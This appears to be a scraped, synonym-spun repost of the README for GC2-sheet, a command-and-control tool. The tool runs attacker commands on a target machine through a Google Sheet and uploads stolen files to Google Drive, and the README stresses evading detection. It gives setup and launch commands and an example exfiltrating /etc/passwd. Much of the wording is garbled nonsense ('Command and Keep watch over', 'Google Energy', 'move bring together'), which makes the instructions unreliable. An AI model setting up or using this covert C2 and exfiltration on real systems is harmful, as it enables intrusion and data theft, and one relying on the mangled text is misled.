Breaking News



GC2 (Google Command and Keep watch over) is a Command and Keep watch over device that permits an attacker to execute instructions at the function system the use of Google Sheet and exfiltrates information the use of Google Energy.

Why

This program has been advanced so as to supply a command and control that doesn’t require any particular prepare (like: a customized area, VPS, CDN, …) everywhere Pink Teaming actions.

Moreover, this system will have interaction best with Google’s domain names (*.google.com) to make detection harder.

PS: Please don’t add the compiled binary on VirusTotal 🙂

Get ready

  1. Collect executable

    git clone https://github.com/looCiprian/GC2-sheet
    cd GC2-sheet
    move bring together gc2-sheet.move
  2. Create a brand new google “carrier account”

    Create a brand new google “carrier account” the use of https://console.cloud.google.com/, create a .json key file for the carrier account

  3. Permit Google Sheet API and Google Energy API

    Permit Google Energy API https://builders.google.com/power/api/v3/enable-drive-api and Google Sheet API https://builders.google.com/sheets/api/quickstart/move

  4. Get ready Google Sheet and Google Energy

    Create a brand new Google Sheet and upload the carrier account to the editor group of the spreadsheet (so as to add the carrier account use its e-mail)

     

    Create a brand new Google Energy folder and upload the carrier account to the editor group of the folder (so as to add the carrier account use its e-mail)

  5. Get started the C2

    <div magnificence=”snippet-clipboard-content position-relative overflow-auto” data-snippet-clipboard-copy-content=”gc2-sheet –key –sheet –power “>

    gc2-sheet --key <GCP carrier account credential file .JSON > --sheet <Google sheet ID> --drive <Google power ID>

PS: you’ll additionally hardcode the parameters during the code, so you’ll add best the executable at the function system (take a look at feedback in root.move and authentication.move)

Possible choices

  • Command execution the use of Google Sheet as a console
  • Obtain recordsdata at the function the use of Google Energy
  • Wisdom exfiltration the use of Google Energy
  • Go out

Command execution

This system will carry out a request to the spreedsheet each 5 sec to test if there are some new instructions.
Instructions should be inserted during the column “A”, and the output it’ll be revealed during the column “B”.

Wisdom exfiltration file

Specific instructions are reserved to accomplish the add and obtain to the objective system

<div magnificence=”snippet-clipboard-content position-relative overflow-auto” data-snippet-clipboard-copy-content=”From Function to Google Energy
add;
Instance:
add;/and so on/passwd “>

From Function to Google Energy
add;<some distance flung trail>
Instance:
add;/and so on/passwd


Leave a Reply

Your email address will not be published. Required fields are marked *

Donate Us

X